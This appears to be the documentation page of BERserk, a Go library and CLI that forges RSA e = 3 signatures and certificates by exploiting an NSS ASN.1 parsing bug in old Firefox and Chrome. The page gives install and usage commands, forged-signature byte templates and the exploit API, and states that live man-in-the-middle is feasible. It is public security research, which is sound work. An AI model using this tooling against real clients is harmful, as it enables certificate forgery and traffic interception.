README
¶
BERserk
A Go implementation of the BERserk attack against Mozilla NSS ASN.1 parsing of PKCS#1 RSA signatures with e = 3. Complete of a certificate generation tool, works with CAs in the trust store.
The attack
The attack exploits Yet Another ASN.1 Parsing Bug in NSS, affecting Firefox 32 and Chrome 37. tl;dr: you can hide garbage in the long length fields of ASN.1 and leverage that to generate fake signatures for keys with e = 3. Bleichenbacher '06 never dies.
You can go read the original Intel Security papers, but be warned that the first is completely generic (even if well detailed) and the second is focused on the vulnerability but glosses over some crucial points. At least in my experience.
You can read what Adam Langley or Mozilla have to say.
This work
BERserk was big but it happened on the same day as ShellShock and no one noticed. So much that there isn't neither a live test for it nor a tool to exploit it. So here we are.
github.com/FiloSottile/BERserk.Signer is a Go crypto.Signer that, given a RSA public key with e = 3 and length 1024 or 2048, will generate (SHA1) PKCS#1 signatures that exploit BERserk without knowledge of the private key.
GoDoc will help you if you use this as a library.
The tool
There's also a command line tool that generates a HTTPS certificate given a fitting CA and a CSR in cfssl format.
There are a few e = 3 root CAs, so exploitation is possible in the wild (against affected versions). A signature is generated in less that 1s so live MitM is also possible.
Install with
go get github.com/FiloSottile/BERserk/BERserker
Use like
BERserker CA.pem csr.json | cfssljson -bare
NOTE: in order to use a custom crypto.Signer for x509 signing BERserker relies on a recent change in Go stdlib. It's not in 1.4, it'll probably be in 1.5, or you can compile Go tip. Otherwise, you'll get this error:
x509: only RSA and ECDSA private keys supported
Demo
There's a live demo at https://berserk.filippo.io
Authors
- Filippo Valsorda @FiloSottile
- Anna Bernardi @AnnaOpss
Documentation
¶
Overview ¶
A Go implementation of the BERserk attack against Mozilla NSS ASN.1 parsing of PKCS#1 RSA signatures with e = 3.
BERserk was big but it happened on the same day as ShellShock and no one noticed. So much that there isn't neither a live test for it nor a tool to exploit it. So here we are.
See also https://github.com/FiloSottile/BERserk/blob/master/README.md
Index ¶
- Variables
- func BigIntCubeRootFloor(n *big.Int) *big.Int
- func BigIntSquareRootFloor(n *big.Int) *big.Int
- func BruteforceMiddle(high, low, target []byte, offset int) ([]byte, error)
- func CubeRootPrefix(prefix []byte, bitLen int) ([]byte, error)
- func CubeRootSuffix(suffix []byte) ([]byte, error)
- func RSA2048SHA1Middle(high, low, target []byte, offset int) ([]byte, error)
- func SignPKCS1v15(bitLen int, hash crypto.Hash, hashed []byte) (s []byte, err error)
- type DigestInfoTemplate
- type ErrRetry
- type Signer
Constants ¶
This section is empty.
Variables ¶
var ( MINUS_ONE = big.NewInt(-1) ONE = big.NewInt(1) TWO = big.NewInt(2) THREE = big.NewInt(3) )
var ( RSA1024SHA1DigestInfoTemplate = &DigestInfoTemplate{ BitLen: 1024, Prefix: []byte{ 0x00, 0x01, 0xFF, 0x00, 0x30, 0xD9, }, Suffix: []byte{ 0x00, 0x00, 0x00, 0x21, 0x30, 0x09, 0x06, 0x05, 0x2B, 0x0E, 0x03, 0x02, 0x1A, 0x05, 0x00, 0x04, 0x14, }, HashLen: 20, } RSA2048SHA1DigestInfoTemplate = &DigestInfoTemplate{ BitLen: 2048, Prefix: []byte{ 0x00, 0x01, 0x00, 0x30, 0xDB, }, Middle: []byte{ 0x00, 0x00, 0x00, 0xA0, 0x30, 0xFF, }, MiddleOffset: 123, Suffix: []byte{ 0x00, 0x00, 0x00, 0x09, 0x06, 0x05, 0x2B, 0x0E, 0x03, 0x02, 0x1A, 0x05, 0x00, 0x04, 0x14, }, HashLen: 20, } )
Functions ¶
func CubeRootSuffix ¶
func RSA2048SHA1Middle ¶
func SignPKCS1v15 ¶
SignPKCS1v15 is the core generic implementation of BERserk. It will generate a signature of hashed that will look valid for any RSA public key of the given length (to implementations vulnerable to BERserk).
ErrRetry is returned when a signature can't be generated for the specific input. Change the message and retry.
bitLen is the length of the public key, only 1024 and 2048 are supported. hash is the function applied to the message to get hashed. Only hash == crypto.SHA1 is supported.
Types ¶
type DigestInfoTemplate ¶
type ErrRetry ¶
type ErrRetry string
ErrRetry is returned when a signature can't be generated for the specific input. Change the message and retry.
Currently mostly happens because the hashed message is required to be odd.
type Signer ¶
type Signer struct {
// contains filtered or unexported fields
}
Signer is a crypto.Signer that given a x509.Certificate with a RSA public key with e = 3 and length 1024 or 2048, will generate PKCS#1 signatures that exploit BERserk without knowledge of the private key.
func New ¶
func New(ca *x509.Certificate) (*Signer, x509.SignatureAlgorithm, error)
New will return a new Signer that generates signatures that will look valid for the given CA certificate.
ca must have a RSA key with length 1024 or 2048 and exponent 3.
func (*Signer) Sign ¶
func (s *Signer) Sign(rand io.Reader, msg []byte, opts crypto.SignerOpts) (signature []byte, err error)
Sign will generate a PKCS#1 signature of msg that will be accepted as valid by BERserk affected validators.
ErrRetry is returned when a signature can't be generated for the specific input. Change a variable field (i.e. serial number) in the message and retry.
rand is ignored and can be nil. Only opts.HashFunc() == crypto.SHA1 is supported.
Source Files
Directories
¶
| Path | Synopsis |
|---|---|
|
A BERserk certificate generation tool based on cfssl and crypto.Signer.
|
A BERserk certificate generation tool based on cfssl and crypto.Signer. |
|
_vendor
|
|
|
github.com/cloudflare/cfssl/auth
Package auth implements an interface for providing CFSSL authentication.
|
Package auth implements an interface for providing CFSSL authentication. |
|
github.com/cloudflare/cfssl/config
Package config contains the configuration logic for CF-SSL.
|
Package config contains the configuration logic for CF-SSL. |
|
github.com/cloudflare/cfssl/csr
Package csr implements certificate requests for CF-SSL.
|
Package csr implements certificate requests for CF-SSL. |
|
github.com/cloudflare/cfssl/errors
Package errors provides error types returned in CF SSL.
|
Package errors provides error types returned in CF SSL. |
|
github.com/cloudflare/cfssl/helpers
Package helpers implements utility functionality common to many CF-SSL packages.
|
Package helpers implements utility functionality common to many CF-SSL packages. |
|
github.com/cloudflare/cfssl/initca
Package initca contains code to initialise a certificate authority, generating a new root key and certificate.
|
Package initca contains code to initialise a certificate authority, generating a new root key and certificate. |
|
github.com/cloudflare/cfssl/log
Package log implements a wrapper around the Go standard library's logging package.
|
Package log implements a wrapper around the Go standard library's logging package. |
|
github.com/cloudflare/cfssl/signer
Package signer implements certificate signature functionality for CF-SSL.
|
Package signer implements certificate signature functionality for CF-SSL. |
|
github.com/cloudflare/cfssl/signer/local
Package local implements certificate signature functionality for CF-SSL.
|
Package local implements certificate signature functionality for CF-SSL. |
|
github.com/cloudflare/cfssl/signer/pkcs11
Package pkcs11 implements support for PKCS #11 signers.
|
Package pkcs11 implements support for PKCS #11 signers. |
|
github.com/cloudflare/cfssl/signer/universal
Package universal implements a signer that can do remote or local
|
Package universal implements a signer that can do remote or local |